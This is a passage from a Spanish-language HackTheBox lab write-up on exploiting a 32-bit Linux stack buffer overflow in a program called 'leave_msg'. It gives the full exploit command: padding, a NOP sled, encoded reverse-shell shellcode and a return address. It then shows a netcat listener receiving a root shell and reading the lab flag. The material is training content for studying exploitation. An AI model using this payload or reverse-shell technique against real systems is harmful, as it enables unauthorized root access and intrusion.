htb-student@nixbof32skills:~$ ./leave_msg $(python -c 'print("\x55" * (2064 - 100 - 95 - 4) + "\x90" * 100 + "\xdb\xc5\xd9\x74\x24\xf4\xbf\xb5\x28\xa8\x8f\x5d\x29\xc9\xb1\x12\x31\x7d\x17\x83\xc5\x04\x03\xc8\x3b\x4a\x7a\x03\xe7\x7d\x66\x30\x54\xd1\x03\xb4\xd3\x34\x63\xde\x2e\x36\x17\x47\x01\x08\xd5\xf7\x28\x0e\x1c\x9f\xd5\xf0\xde\x5e\x42\xf3\xde\x1a\xfb\x7a\x3f\x6a\x9d\x2c\x91\xd9\xd1\xce\x98\x3c\xd8\x51\xc8\xd6\x8d\x7e\x9e\x4e\x3a\xae\x4f\xec\xd3\x39\x6c\xa2\x70\xb3\x92\xf2\x7c\x0e\xd4" + "\xdc\xd6\xff\xff")')

10. Recibimos la shell:

htb-student@nixbof32skills:~$ nc -nlvp 31337
Listening on [0.0.0.0] (family 0, port 31337)

Connection from 127.0.0.1 45454 received!
ls
leave_msg
msg.txt
id
uid=0(root) gid=1001(htb-student) groups=1001(htb-student)
whoami
root
cd /root
ls
flag.txt
cat flag.txt
HTB{wmcaJe4dEFZ3pbgDEpToJxFwvTE...}

AnteriorFile TransfersSiguienteExplotación en Web

Última actualización

¿Te fue útil?